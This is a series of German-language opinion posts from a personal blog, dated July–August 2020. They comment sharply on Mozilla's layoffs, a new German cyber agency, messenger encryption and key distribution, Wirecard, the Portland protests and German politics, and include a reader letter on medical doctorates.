Eines Tages werden die nächsten Bewohner des Planeten unsere Ruinen ausgraben und genau so staunen wie wir bei den Statuen auf den Osterinseln heute staunen. Wie konnten die so blöde sein? Haben die nicht gemerkt, dass sie bald tot sind, wenn sie jetzt nicht handeln? Wieso würden die ihre letzten Ressourcen in den Bau von diesem Bullshit stecken statt in ihre Rettung?

Fri Aug 14 2020

[l] Erinnert ihr euch, wie Mozilla 25% ihrer Mitarbeiter gefeuert hat? Weil sie angeblich zu wenig Kohle hatten?
Nun, die Gehälter für ihre 1000 Mitarbeiter haben 2018 zusammen 286 Millionen Dollar betragen. Jetzt haben sie einen frischen Deal mit Google über 450 Millionen Dollar pro Jahr gemacht.
Äh, ... an welcher Stelle kommt da eine Geldknappheit ins Spiel?
Wie hoch ist denn bitte das Koks-und-Nutten-Spesenbudget der Chefetage da!?

Thu Aug 13 2020

[l] Habt ihr das mitgekriegt, dass die Russen die Tage einen Covid-Impfstoff angekündigt hatten? Putins Tochter hat sich damit schon impfen lassen, die scheinen also zumindest sicher zu sein, dass er nicht schadet.
Und die Reaktion der Welt war Häme. Ja nee klar, die Russen, völlig unverantwortlich, das kann gar nichts sein, viel zu kurzfristig, so schnell geht das nicht.
Sehe ich übrigens auch so. Sowas braucht Tests, und die haben sie auch nach eigenen Angaben noch nicht alle gemacht. Daher hab ich darüber nicht berichtet. "Wir wissen noch nicht, ob es funktioniert" heißt ja nicht, dass es Bullshit ist. Muss man jetzt gucken, und vielleicht hatten sie ja einen Glückgriff.
Aber darum geht es mir gerade nicht. Heute in den Nachrichten: Heldenhafte amerikanische Corona-Forscher bringen Nasenspray. Da hätte die Reaktion genau so sein müssen, denn inhaltlich ist das vergleichbar unfertig. Stattdessen ... das Gegenteil. Boah geil, Hoffnung, lobet die Amis!!1! Oh und ein Deutscher war auch beteiligt!1!!
Sowas ärgert mich ja sehr, muss ich euch sagen.

Wed Aug 12 2020

[l] Ratet mal, welche Abteilung sie bei Mozilla zugemacht haben!
Kommt ihr NIE drauf!
Das Security-Team!
They killed [the] entire threat management team. Mozilla is now without detection and incident response.
Mozilla ist ja jetzt schon eine Katastrophe, wenn es um Security geht. Guckt euch nur mal die Fixes in Firefox 79 ein. Ach komm, Fefe, sind doch nur 4 high!1!! Ja schon, aber scrollt mal runter, da haben sie einen use after free memory corruption bug als "moderate" klassifiziert. Scrollt mal noch weiter runter. Oh gucke mal, ganz am Ende ist ja noch ein "high"! Na sowas! Ist gar nicht sortiert, haben sie nur vorgetäuscht, damit du nicht siehst, dass sie 5 statt 4 highs haben!
Das ist der Zustand, in dem die Security bei Mozilla vor der Entlassung des Security-Teams war.
Aber war ja klar, dass das so kommen wird. Wenn eine große Organisation mit 80% Wasserkopf in finanzielle Not gerät, wurde noch nie der Wasserkopf verkleinert. Da werden immer die letzten paar Ingenieure gefeuert.
Update: Sie haben nicht die ganze Security-Abteilung zugemacht. Das Gecko-Team gibt es noch. Ohne die jetzt mit Scheiße bewerfen zu wollen: Gecko ist der Legacy-Kack-Teil von Firefox. Der, der durch Rust-Komponenten und Webrender ersetzt werden sollte, damit wir endlich weniger Sicherheitlücken haben.
Update: Die Rust-Engine, die Gecko ersetzen sollte, heißt Servo. Die wird offenbar auch gerade plattgemacht. Das ist furchtbar, geradezu katastrophal. Das war unsere eine Hoffnung auf eine nicht 100% von Google kontrollierte Browser-Zukunft. Gecko hat keine Zukunft.
Und das MDN-Team ist auch weg. MDN ist fast noch wichtiger als Firefox, das ist die Dokumentation der ganzen Web-Standards bei Mozilla.
[l] Gute Nachrichten! Deutschland hat endlich eine neue Bundesbehörde! Endlich ein gutbezahltes Endlager für die ganzen SPD-Verwaltungshengste! Aber nein! Diese neue Behörde ist eine "Cyberagentur" und wird endlich für IT-Sicherheit im Lande sorgen! Sie untersteht gemeinsam dem Verteidigungs- und dem Innenministerium.
Damit ist auch direkt klar, was die für die Sicherheit im Lande tun wird: Gar nichts. Das Verteidigungsministerium kümmert sich ausschließlich um "offensive Security", also um das Einbringen und Ausnutzen von Backdoors und das Kaufen und Ausnutzen von Exploits. Die haben mit Verteidigung soviel zu tun wie Militärmusik mit Musik.
Und das Innenministerium sind die, die Krypto-Hintertüren in eurer Infrastruktur fordern und Staatstrojaner entwickeln lassen. Die haben mit Sicherheit so viel zu tun wie ein Sicherheitsloch.
Ich würde da ja noch mehr schreiben, aber schon die offizielle Meldung der Tagesschau sagt alles, was gesagt werden muss. Seht selbst.
Die Bundesregierung hat die offizielle Gründungsurkunde für eine neue Cyberagentur unterzeichnet. [...] Aufgabe der Behörde ist es, vielversprechende neue Entwicklungen im Bereich der Cybersicherheit zu identifizieren und zu fördern. Die Ergebnisse soll sie der Bundesregierung zur Verfügung stellen und so die innere und äußere Sicherheit verbessern.
Achtet mal drauf. Wer kriegt die Erkenntnisse? Nicht die Netzbetreiber, nicht die Infrastrukturbetreiber, nicht ihr. Die Bundesregierung. Und die war bisher an Sicherheitslücken nur interessiert, um sie geheim zu halten und für Einbrüche zu benutzen.
Mit der Agentur werde Deutschlands "digitale Souveränität" gestärkt, hießt es. Die Bundesregierung will bei der Cybersicherheit nicht wie bisher stark auf Hilfe aus dem Ausland angewiesen sein.
Die Bundesregierung war in Cybersicherheitsfragen noch nie auf das Ausland angewiesen. Aus Deutschland kamen die besten Hacker der Welt. Weil man hier kostenlos studieren konnte und während des Studiums Zeit zum Spielen hatte. Das endete erst mit dem Hackertoolverbot. Ich habe denen damals ins Gesicht gesagt, dass sie das bereuen werden, weil ihnen dann keiner der guten Hacker mehr helfen wollen wird. Ihr werdet nicht glauben, was dann passiert ist!1!!
Ja aber komm, Fefe, es kann doch sein, dass auch ein blindes Huhn mal ein Korn findet! Vielleicht haben die ja versehentlich einen Durchbruch! Nun, das halte ich für ausgeschlossen. Seht selbst:
Forschungsdirektor der Cyberagentur ist Christoph Igel. Er war ein führender Kopf am Deutschen Forschungszentrum für Künstliche Intelligenz, bevor er zur Bundeswehr wechselte und jetzt den Aufbau der neuen Cyberagentur übernahm.
Ich kenn den Igel nicht. Aber Forschungszentrum für Künstliche Intelligenz? Das sind genau die, die mit Security NICHTS zu tun haben. KI hat nicht mal am Rande was mit Security zu tun.
Aber wartet. Ignorieren wir das mal. Nehmen wir an, das sei ein wichtiges Institut und die hätten da wichtige Arbeit gemacht. Und dann lässt der sich abwerben? Zur ... Bundeswehr!?!?
Ja, äh, nee. Ich erwartet da nichts. Ich glaube nicht, dass die einen Durchbruch erkennen würden, wenn sie über einen stolpern.
Und das ist auch gut so, denn wenn ich zwei Organisationen benennen sollte, die auf gar keinen Fall einen Durchbruch in "Security" haben sollten, dann wären es das Militär und das Innenministerium.

Sat Aug 8 2020

[l] Kurze Durchsage des Berliner Bürgermeisters zur Schulöffnung nach den Sommerferien:
«Ich glaube das, was man machen kann in einem Schulbetrieb mit Hunderttausenden Schülerinnen und Schülern, das haben wir auch gemacht»
Oh, ach? Und was wäre das?
Das neue Schuljahr für 325 000 Schüler an allgemeinbildenden Schulen und 33 000 Lehrer beginnt am Montag - ohne Mindestabstand, dafür mit Maskenpflicht und Hygieneregeln. Dazu gehört regelmäßiges Lüften der Unterrichtsräume in enger Taktung.
War ja klar. Die einzigen Maßnahmen waren die, die nichts kosten. Die Masken zahlen die Eltern und lüften kostet nix.

Tue Aug 4 2020

[l] Was für eine wunderschöne Schlagzeile:
The Truth Is Paywalled But The Lies Are Free
Ich glaube ja, das ist nicht nur Truth and Lies sondern Nachrichten und Meinungen. Nachrichten kosten Geld und Aufwand. Eine Meinung hat jeder und sie kostet nichts. In meiner Phantasie hätte es da zwei Möglichkeiten gegeben: Die Nachrichten kosten Geld und die Meinungen sind kostenlos. Oder: Die Nachrichten sind gemeinfrei und die Analysen kosten Geld.
Tatsächlich haben aber die Zeitungen gemerkt, dass man die Leser mit Clickbait und Emotionen bindet und ihnen mehr Werbung reindrücken kann und haben daher von teuren Nachrichten auf billige Bullshit-Meinungsmache umgesattelt. Und jetzt stellen die Zeitungen fest, dass man Meinungen auch kostenlos von Twitter und Youtube kriegt und dafür keiner ihrer Paywall Geld in den Rachen werfen muss. Und dass man Nachrichten kostenlos bei ARD und ZDF kriegt und dafür keiner Paywall Geld in den Rachen werfen muss.
Ich glaube, dass das das eigentliche Dilemma der Zeitungen ist. Die haben alle ihre Redaktionen kaputtgekürzt und durch Buzzfeed-Contentfarmen ersetzt. Und jetzt können sie nicht mal ansatzweise mit ARD und ZDF mithalten, wenn es um Nachrichten geht. Und der Rest von dem, was die so anzubieten haben, ist nichts wert. Hat ja einen Grund, dass niemand Paywall für so Bento/Zett/Buzzfeed-Bullshit gemacht hat. Selbst ohne Paywall will das keiner lesen.

Sat Jul 25 2020

[l] Die ACLU hat eine Einstweilige Verfügung gegen Trumps Truppen in Portland erwirkt.
The ruling, which comes in a case brought by the @ACLU_OR , temporarily blocks federal agents from attacking or arresting journalists and legal observers at Portland protests.
Wenn immer eine Sache so klar aussieht, nagt ja die Befürchtung an mir, dass wir hier nur die halbe Wahrheit kriegen. Neulich sah ich ein Youtube-Video von Bret Weinstein, der die andere Sicht zu beschreiben versuchte. Der meinte, das seien keine Proteste sondern das sei Looting, und der Bürgermeister von Portland habe sich mit den Lootern gemein gemacht und die Polizei am Eingreifen gehindert, was die verfassungsmäßigen Rechte der Ladenbesitzer verletzt. Trump habe gar keine andere Möglichkeit gehabt als da Truppen zu schicken. Mit anderen Worten: Das war eine Provokation Portlands.
Ich vermute, dass wie so häufig beide Seiten Recht haben.
Update: Das offensichtliche Gegenargument ist, dass die formale Begründung für den Einsatz der taktischen Kleinbusse nicht Looting sondern sowas wie "Graffiti am Federal Building" ist. Das hat formaljuristische Gründe. Für Looting sind die Feds nicht zuständig, außer der Dieb kreuzt State Lines. Für Beschädigungen an Bundesgebäuden kann Trump Zuständigkeit glaubwürdig behaupten.
Es kursiert das Gerücht, die Söldner in den taktischen Kleinbussen seien von Blackwater.
Trump kann die Aktion natürlich prima als Ablenkung von seinem sonstigen Totalversagen brauchen, klar, aber der Bürgermeister von Portland hat sich von den Feds erstmal mit Tränengas behandeln lassen, und sich damit auch die Wiederwahl gesichert. Auf beiden Seiten kämpfen hier schmierige Politiker, verliert das mal nicht aus den Augen.

Wed Jul 22 2020

[l] OK also jetzt muss ich doch noch mal meckern hier.
Ich hatte den Michael Moore-Film verlinkt, an dem es inhaltlich Dinge zu kritisieren gibt, und habe es sogar direkt als Medienkompetenzübung markiert.
Was wollte ich damit erreichen? Dass ihr den Film guckt und euch dann selber Quellen raussucht und euch eine Meinung bildet. Nicht über den Film sondern über die im Film behaupteten Dinge.
Was passierte stattdessen? Ihr habt eine Suchmaschine aufgemacht und nach Debunking-Artikeln gesucht. Das war eine Falle, die ich gestellt habe.
Wenn du gerne glauben willst, dass deine Spezies nicht dem Untergang geweiht ist, dann bist du voreingenommen. Wer voreingenommen ist, hat den Confirmation Bias, und glaubt eher Meldungen, die die aktuelle Position bestätigen. Du wirst also eher Meldungen glauben, die Hoffnung machen.
Wenn ihr jetzt also irgendwelche Debunking-Artikel findet und denen einfach glaubt, dann habt ihr nichts gewonnen. Ihr glaubt halt statt dem Michael Moore lieber jemand anderem. Das ist immer noch Glauben statt Quellenarbeit.
Ein ordentlicher Umgang mit den Inhalten ist nicht damit erledigt, dass man einen Artikel findet, der sagt, dass das alles falsch war. Auch nicht wenn der gute Quellen hat. Denn die meisten dieser Artikel sind von Organisationen, die Moore in dem Film kritisiert hat, oder die Dinge tun, die Moore in dem Film kritisiert hat. Die haben a) ein Interesse daran, ihre Seite möglichst gut darzustellen, und b) auch Confirmation Bias! Ihr solltet nicht einfach annehmen, dass deren Ausführungen schon richtig sein werden, auch nicht wenn die gute Quellen angeben. Wer sagt euch denn, dass es auch gute Quellen für die gegenteilige Erkenntnisse gibt, die die halt nicht erwähnt haben?
Das klingt jetzt wie Doctor Evil aber so ist es nicht gemeint. Was wenn sie das gar nicht bewusst tun, sondern weil sie für sich entschieden haben, dass die nicht so glaubwürdig sind? Was ja zu erwarten wäre, denn wenn sie die für glaubwürdig hielten, würden sie ja vielleicht nicht für die Organisation arbeiten oder die Organisation verteidigen, die von deren Aussagen angegriffen wird!
Kurz gesagt: Macht euch das nicht zu einfach mit der Meinungsbildung. Schon gar nicht zu einem so existenziellen Thema wie ob unsere Spezies bald aussterben muss oder nicht.
Ich habe das hier an der Klimakatastrophe illustriert aber eigentlich ist es ein viel häufigeres Muster. Polizeibrutalität? Hier ist die Aussage der Polizei. Ja wie jetzt, wieso würden wir denen die Deutungshoheit überlassen?! Die sind nicht neutral!
Antisemitismus? Der Zentralrat der Juden sagt: Ja.
Sind Transfrauen Frauen? Diese Trans-Aktivistenorganisation sagt: Ja.
Natürlich werden in einer Auseinandersetzung immer die beiden Seiten das sagen, was im Interesse ihrer Seite ist. Die Deutungshoheit sollte nie bei Leuten liegen, die ein Interesse an einem bestimmten Ergebnis haben. Genau so ist das auch mit Jugendschutz im Internet, und mit Leuten, die angeblich Kindesmissbrauch bekämpfen wollen, und dann irgendwelche phantastischen Fallzahlen behaupten. Oder, ein Klassiker hier im Blog, wenn das Patentamt entscheidet, was patentierbar ist, und dann natürlich alles für patentierbar hält, weil sie pro Patentanmeldung Geld einnehmen.
Oder Geldwäsche- und Terrorismusbekämpfung.
Wohlgemerkt: Nur weil jemand ein Interesse an einem Ergebnis hat, heißt das nicht, dass das illegitim ist oder die Unrecht haben werden. Es gibt ja meistens auf beiden Seiten eines Konfliktes Aktivistengruppen, und mindestens eine davon wird richtig liegen, häufig liegen beide richtig (aber nicht in allen Aspekten).
[l] Michael Moore hat einen neuen Dokumentarfilm produziert. Er war nur Produzent, den Film gemacht hat ein Typ namens Jeff Gibbs, der so eine Art enttäuschter Öko-Aktivist zu sein scheint. Mitten in der Corona-Krise waren die Kinos zu, also haben sie den Film kostenlos bei Youtube hochgeladen. Das war im April. Ich bin jetzt erst dazu gekommen, mir den anzusehen.
Wie alle Filme von und mit Michael Moore ist das eine emotionale Achterbahnfahrt, erzählt sehr überzeugend eine mitreißende Geschichte und bietet Stoff zum Nachdenken und für Diskussionen. Kurz: Eignet sich exzellent als Medienkompetenzübung, aber auch der Stoff sollte uns allen am Herzen liegen.
Der Film stellt mehrere Thesen auf.
1. Die US-Umweltschutzbewegung ist komplett von Milliardären unterwandert worden
2. Die sagen zwar immer Solar und Wind aber am Ende werden dann Biomasse-Kraftwerke subventioniert, und in denen wird dann frisch abgeholzter Wald verfeuert.
3. Die Umweltzerstörung dadurch ist größer als die vom Kohlebergbau und für die Bekämpfung der Klimakatastrophe ist das sogar schädlicher als nichts zu tun.
Interessanterweise kommen auch die Koch-Brüder vor, die sowas wie die Teufels-Figur in der US-Politik sind, die angeblich ein dunkles Imperium betreiben, was böse Dinge tut. Aber irgendwie ist das bisher nie greifbar für mich geworden, was die eigentlich konkret tun. Dieser Film hat das geändert. Die liefern die ganzen Komponenten, die für die Abholzung und Biomasse-Verfeuerung von Wäldern gebraucht werden.
Der Film behauptet auch, dass die Herstellung von Solarzellen mehr (fossile) Energie braucht, als die Solarzellen dann wieder einspielen können.
Da die Filmveröffentlichung schon vor über zwei Monaten war, gibt es jetzt auch schon angebliche Debunking-Videos dazu, deren Kernkritik zu sein scheint, dass seine Beispiele ja alt sind, und die Technologie wird ja auch immer besser, und wir techen uns schon mit innovativer Technik aus dem Tech-Problem raus. Das ist eine unter Konservativen beliebte Argumentation, mit der ich persönlich noch nie viel anfangen konnte. Da würde ich die Zukunft der Spezies nicht drauf wetten wollen, dass schon jemandem was einfallen wird.
Von der Länge her ist das ein Kinofilm um die 90 Minuten. 90 Minuten, die ich nicht bereue gerade.

Tue Jul 21 2020

[l] Eines der Hauptprobleme von Kryptografie ist, dass es da eine inhärente Komplexität gibt. Die Algorithmen und Protokolle selbst kann man wegkapseln, das meine ich nicht. Aber du brauchst plötzlich einen Schlüssel, und musst dir Gedanken machen, wo du den speicherst und wie du den schützt. Und dann gibt es plötzlich das Schlüsselverteilungsproblem. An welchen Schlüssel verschlüsselst du? Woher nimmst du die Gewissheit, dass das der richtige Schlüssel ist? Was wenn der kompromittiert ist?
Frühe Krypto-Software wie PGP haben nicht versucht, diese Komplexität zu verbergen. Die haben sich das angeguckt und sind zu dem Schluss gekommen, dass man die Lage nur unsicherer macht, wenn man so tut, als könnte man das in der Software lösen.
Ergebnis: Jahrelanges Herumgeflenne von Vollidioten, dass die Software ja so schwer zu bedienen sei. Man muss neue Konzepte lernen und so!1!!
Also ist moderne Krypto-Software anders. Die macht faule Kompromisse und verbirgt die Komplexität hinter einer Nebelwand aus Lügen und "weitergehen, gibt nichts zu sehen hier"-Bullshit. Am besten noch mit ein paar Dark UI Patterns wie bei Signal, der dir gelegentlich anzeigt, ein Schlüssel habe sich geändert, aber dir nicht sagt, was das bedeutet, und ob du jetzt was tun solltest oder nicht.
Das Problem ist: Da kann die Krypto so geil sein wie sie möchte! Lücken, die das UI aufreißt, kriegt auch der tollste Algorithmus nicht kompensiert.
Nimm z.B. Signal. Signal hat das Key Distribution Problem nicht gelöst. Daher hängen bei denen die Accounts an der Telefonnummer. Was für Auswirkungen hat das, wenn du deine Telefonnummer oder Simkarte verlierst? Das ist dem normalen Anwender überhaupt nicht klar.
Ich will hier nicht Signal bashen, die sind noch einer der besseren Marktteilnehmer. Ich erwähne die hier nur, weil die ein Vorreiter von neuartiger toller Krypto sind.
Nächstes Problem. Sagen wir mal, du baust einen Keyserver auf, wo man seinen Schlüssel höchlädt. Wenn jemand mit mir reden will, holt der sich meinen Schlüssel von dort. Super? Nein! Was wenn der Schlüssel da nicht von mir sondern vom BKA hochgeladen wurde?
PGP hat hier auch keine gute Lösung. Die haben sich gedacht, das wird dem Anwender schon klar sein, dass er Schlüssel von irgendeinem Server aus dem Internet erstmal prüfen muss. Daher gibt es Fingerprints und Signaturen unter dem Schlüssel. Was hat es gebracht? Sobald jemand kam und Gibt-hier-nichts-zu-sehen-UI um Bullshit-Automatismen um die Keyserver gebaut hat, war es plötzlich ein legitimer Angriff, dort einen falschen Key für jemanden hochzuladen, um dessen Kommunikation zu sabotieren. Wenn die Leute alle ihre Keys verifizieren würden, wäre das überhaupt kein Problem. Aber Dark UI hat das kaputtgemacht.
Warum erzähle ich das alles? Nun, Keyserver gibt es auch bei Messenger-Diensten. Und da kann die Krypto so geil sein wie sie will: Wenn du den Key automatisch vom Keyserver holst, kann der dir auch "den BKA-Key" unterschieben und behaupten, das sei der, nach dem du gefragt hattest.
Oder noch besser: Was wenn du Synchronisation anbietest? Dann kann ein Angreifer mal eben eine Weiterleitung an das BKA eintragen bei dir, wenn der kurzzeitig Zugriff auf deinen Account hat, und dann können die alles mitlesen.
Ach komm, Fefe, das ist doch unsubstanziiertes Paranoia-Geraune! Nun, äh, genau das hat das BKA bei Whatsapp gemacht.
Aber hey, solange gemeingefährliche Heulsusen uns die Krypto-Anwendungen schlechtreden, die die Komplexität an den User weiterleiten, damit er sie managen kann, und den Leuten Weitergehen-Apps empfehlen, die die Komplexität hinter Nebelwänden verstecken und den Leuten eine warme Gemütlichkeit vorgaukeln, die nicht da ist, wird diese Art von Problem noch zunehmen.
Update: Das soll kein Signal-Bashing werden hier. Die geben sich immerhin Mühe und sagen dir, wenn sich ein Schlüssel geändert hat. Andere zeigen das nicht mal an, weil es ja "die Bevölkerung verunsichern würde".
Update: Da hab ich wohl einige Leser überfordert. Whatsapp ist Ende-zu-Ende-verschlüsselt. Das heißt der Server kann gar nicht die alten Nachrichten im Klartext weiterreichen, selbst wenn er wollte, weil die da nur verschlüsselt vorbeihuschen. Wenn man also Synchronisieren will, gibt es zwei Varianten: Entweder man rückt den Schlüssel raus (daher meine Ausführungen oben über Schlüsselaustausch) oder man macht eine Fernsteuerung der Handy-App von dem Browser aus, in welchem Fall man auch ein Zugriffstoken (vulgo: einen Schlüssel) hat, den man dem BKA gibt.

Fri Jul 17 2020

[l] Zerstörungsvideos sind ja jetzt hipp, also hat auch Martin Sonneborn eines gemacht, über die Osteuropäischen EU-Mitgliedsstaaten. Knapp 20 Minuten.
[l] Leserbrief zu dem offenen Brief:
über Rowling hattest Du ja schon kurz berichtet. Das wurde ja so hässlich, dass Aktivisten auf Twitter-Threads von Kindern, die Bilder zum Märchen von Rowling gemalt haben, Penis-Bilder gepostet haben. Alles im Namen des gerechten Kampfes für Trans-Menschen.
Aber was ich eigentlich sagen wollte, ein Kuriosum am Rande, dass in Deine Bresche schlägt. Rowling hat einige Tage später dann einen öffentlichen Brief gegen Cancel-Culture und für freie Meinungsäußerung ohne Todesdrohungen einiger Prominenter mit unterschrieben.
Kurze Zeit später distanzieren sich einige Unterzeichner vom Brief für freie Meinungsäußerung (ohne Internet-Hass-Mobs), weil Rowling unterzeichnet hat mmmmm(
Hier eine Aufschlüsselung der Ereignisse, von jemandem, der den Brief eher kritisch gegenüber steht.
[l] Gestern rettet uns Max Schrems vor dem Privacy Shield, heute rettet uns Patrick Breyer vor der Bestandsdatenauskunft (wenn die zur Strafverfolgung oder Terrorabwehr auf eure Handydaten zugreifen). Und wie bei Schrems war das die 2. Bullshitregelung, nachdem Breyer schon die vorige Bullshitregelung zerlegt hatte.
Schade nur, dass das immer mehrere Jahre dauert, und die solange einfach schamlos die nächste Bullshit-Regelung beschließen können, die dann wieder jemand in jahrelanger Kleinarbeit zersägen muss.
Wir müssen mal irgendwie die Aufwandsasymmetrie umdrehen. Es muss einfacher sein, deren Bullshit wegzuballern, als sich neuen Bullshit aus dem Arsch zu ziehen und weiterzumachen.
Ich bin ja nach wie vor ein Freund der persönlichen Konsequenzen für die Leute, die die Bullshit-Regelungen gemacht haben.
[l] Aktuelles Wirecard-Highlight: Wirecard hat anscheinend in ihren Pressemitteilungen Partnerschaften erfunden.
Im Falle von SAP habe Wirecard etwa im Februar verkündet, dass man nun offizieller Entwicklungspartner des Softwarekonzerns sei. "Wirecard hat eine Partnerschaft mit SAP bekannt gemacht, die von uns nie unterzeichnet wurde – und wir haben auch nie der Publikation einer Pressemitteilung zugestimmt", zitiert das Wall Street Journal einen Sprecher von SAP dazu.
Wenn ihr dachtet, das war schon die Punchline, dann bleibt mal kurz sitzen:
Eine Richtigstellung hatte SAP demnach aber auch nicht von Wirecard verlangt.
Wait, what?!?
m(
Da sieht man mal schön, wie viel von dem Business as Usual da draußen einfach nur Blender sind, die sich im Kreis blenden.

Thu Jul 16 2020

[l] Leserbrief zum Amtsgericht Köln:
interessante Brücke, die der Leserbriefschreiber gefunden hat, von der Filesharing-Oma zur Polizei in Hessen. Die Idee, ein Kölner Gericht mit der Aufklärung der Vorfälle zu beauftragen, sollte man aber noch mal überdenken:
[Süddeutsche]
Es geht um einen Zwischenfall, bei dem sechs Polizisten und ein Journalist der Süddeutschen Zeitung involviert waren. Der Journalist endete mit einem gebrochenen Knöchel und anderen Blessuren im Krankenhaus. Was genau passiert ist, bleibt unklar. Heraus kam allerdings, dass die Polizisten ihre Aussagen abgesprochen hatten. Dass es keine professionelle Vernehmung der Polizisten gab, und keine professionellen Protokolle ("welche Fragen den Beamten gestellt wurden, geht daraus nicht hervor"). Weitere Zeugen waren zwar bekannt, wurden aber nicht befragt. Und die Untersuchung hat ein Kumpel eines der Beschuldigten Polizisten gemacht, man kennt sich aus der gemeinsamen Ausbildung.
Für die Wahrheitsfindung ist das aber nicht relevant:
"Um sein Urteil zu finden, braucht der Einzelrichter am Amtsgericht Köln keine drei Minuten, er spricht den Angeklagten frei. Vorsatz sei dem Polizisten Oliver K. nicht zu unterstellen, Corpsgeist der Polizisten könne er nicht erkennen. Es gebe mehrere Varianten, wie Cáceres sich verletzt haben könnte: Schon bevor er aus dem Taxi ausgestiegen ist, ohne Fremdeinwirkung "durch Gewichtsverlagerung" am Ort des Geschehens oder durch einen versehentlichen Tritt auf den Fuß durch den Beamten. Das aber sei nicht strafbar, weil die Polizeimaßnahme insgesamt "sachgemäß und rechtmäßig" gewesen sei, der Geschädigte sich hingegen "völlig unangemessen verhalten und eine Polizeimaßnahme gestört" habe.”
And justice was served! (Danke, Peter)

Wed Jul 15 2020

[l] Thüringens Verfassungsgericht hat die Quotenregelung für Parteien-Listenplätze gekippt.
OK, nur zur Sicherheit, dass ich das auch richtig verstehe.
Wenn ein Mann in der Politik sich um seine Wiederwahl kümmert statt um die Bedürfnisse seiner Wähler, dann ist das verwerflich, böse und schlecht.
Aber wenn eine Frau in der Politik erstmal eine Frauenquote einzuführen versucht, WAS GENAU DASSELBE IN GRÜN IST, dann ist das progressiv, edel und gut?
Ja nee, klar.
Wo sind eigentlich die Frauen mit Integrität in der Politik geblieben? Wir hatten mal eine Rita Süssmuth, und eine Sabine Leutheusser-Schnarrenberger. Menschen mit Integrität, die sich Respekt erarbeitet haben! Politiker, die für mehr als Machterhalt und ihre Wiederwahl standen!
Ich mach mich hier seit Jahren über Wolfgang Schäuble und seine schwarzen Kassen lustig. Das waren so Größenordnung 2 Mio DM. Eine Menge Holz, versteht mich nicht falsch. Aber man vergleiche das mal mit der Kohle, die Frau von der Leyen in der Berateraffäre ~~veruntre~~ verbrannt hat: 157 Mio alleine im ersten Halbjahr 2019.
Vielleicht sollte ich an dieser Stelle daran erinnern, dass wir a) mehr Frauen haben und die b) länger leben. Das System ist jetzt also schon rechnerisch ungerecht gegenüber den Männern. Wenn die Frauen wollten, könnten sie einen weiblichen Durchmarsch ins Parlament wählen. Haben sie aber nicht gemacht. DAS LIEGT DOCH NICHT AN DER FEHLENDEN QUOTE! Das liegt daran, dass die Frauen in der Politik bisher genauso inkompetent und genauso korrupt waren und genau so wenig geliefert haben wie die Männer!
Wie wäre es, wenn wir uns mal um DAS Problem kümmern würden?
Das kann doch nicht nur mir auffallen, dass keine von den Frauen in der Linkspartei gerade irgendwie in Erinnerung bleiben konnte? Außer Sahra Wagenknecht, klar, aber die haben sie ja so gut wie rausgeekelt. Nicht dass die Männer in der Linkspartei mehr Eindruck hinterließen, seit Oskar Lafontaine und Gregor Gysi weg sind.
Eines Tages werden sie merken, dass die Politiker aussehen, als würden sie ihren Job machen, die mehr als nur die Parteilinie vertreten. Leute, die die Parteilinie vertreten, sind in meinen Augen Verwalter, nicht Politiker. Politiker sind dazu da, sich Gedanken zu machen, und eine Linie zu entwickeln, nicht bloß die Linie anderer Leute zu vertreten.
Als Wähler will ich doch Leute haben, die etwas verbessern wollen im Land. Wieso würde ich da jemanden wählen oder auch nur in Erinnerung behalten, der nicht mal an der eigenen Parteilinie etwas zu verbessern versucht, wo er Einfluss gehabt hätte?
Was mich am meisten daran ärgert: Ausgerechnet Bernd Höcke hat das Konzept verstanden. Und alle anderen so: Wieso gucken so viele Leute auf den?! NA WEIL DER GLAUBWÜRDIG SIMULIERT, ETWAS ÄNDERN ZU WOLLEN!

Tue Jul 14 2020

[l] Hat hier jemand 12 Jahre Kubernetes-Erfahrung? IBM sucht euch. Oh, was sagt ihr? Kubernetes ist erst 6 Jahre alt? Nun, äh, ... ja schon. Eigentlich sucht IBM einen Zeitreisenden.
Mir hatte jemand die ursprüngliche Stellenanzeige gemailt, aber die war schon weg, als ich sie verlinken wollte. Das hier ist ein Artikel über die Anzeige.

Thu Jul 9 2020

[l] Und NOCH ein Plagiats-Leserbrief. Jetzt ist aber langsam wirklich Schluss!
nachdem ja nun diverse Plagiatjäger zu Wort kamen, will ich das Thema mal ein wenig aus der "Täter"-Perspektive" beleuchten:
Ich habe in den 80er-Jahren Medizin studiert, das war eine Zeit in der es deutlich mehr Studienabsolventen als vernünftige (Facharzt-) Ausbildungsplätze für Berufsanfänger in den Krankenhäusern gab. Die angstellten Ärtze waren so gut wie gar nicht gewerkschaftlich organisiert und man konnte somit mit ihnen machen, was man wollte: Gängelung durch dissoziale Chefs, unzählige unbezahlte Überstunden, erstmal ein Jahr zum halben Gehalt, "mal sehen wie Sie sich machen", sowas war überall an der Tagesordnung.
Gleichzeitig war klar, daß mit einem schlechten Examen oder eben ohne Promotion die Chance, eine halbwegs vernünftige Stelle zu finden, noch marginaler wurde. Es haben also so gut wie alle meine Kollegen zu dieser Zeit eine Doktorarbeit gemacht, und zwar auch dann, wenn in Ihrem Lebensentwurf eine wissenschaftliche Karriere überhaupt keine Rolle spielte ( nebenbei, die Schnittmenge von "guter Arzt" und "guter Wissenschaftler" ist m.E. nicht sehr groß ).
Was daraus folgte war, daß die medizinischen Fakultäten eine große Menge billiger ( d.h. kostenloser) Hilfskräfte zur Verfügung hatten. Ich selbst - und die allermeisten meiner Kollegen haben eiinfach ein, zwei Jahre einem "wirklichen" Wissenschaftler die niederen Arbeiten gemacht und die Belohnung war dann halt dieser Doktortitel. Die medizinischen Promotionen wären in den meisten anderen Fächern vielleicht gerade als Diplomarbeiten durchgegangen, jeder von uns wusste das.
Ich hatte wirklich keinerlei kriminelle Energie, aber ich bin ziemlich sicher, dass meine Arbeit dem einen oder anderen Plagiatsexperten feuchte Träume machen könnte.
(Nur der Form halber : es gab natürlich auch "richtige" medizinische Doktorarbeiten mit hohem Anspruch und Qualität, von Leuten, die eben auch Wissenschaftler werden wollten)
So und was ist nun also passiert?
In den letzen zwanzig Jahren hat sich das Verhältnis von Studienabsolventen zu Assistenzarztstellen umgekehrt. Die Chefs üben sich in Mitarbeiterförderung und gehen an die Unis um sich Absolventen anzulachen. Die Krankenhäuser werben regelrecht um medizinischen Nachwuchs. Die -mittlerweile- gewerkschaftlich besser organisierten angestellten Ärzte arbeiten zunehmend nach Tarif und werden auch so bezahlt.
Kein junger Kollege (ausserhalb der Unikliniken) muss noch promovieren und also macht es auch kaum noch einer. Trotzdem sind immer noch alle der Herr oder die Frau "Doktor". Die einen ohne Promotion, die anderen mit unsauberer Promotion und einige wenige mit lupenreiner Promotion.
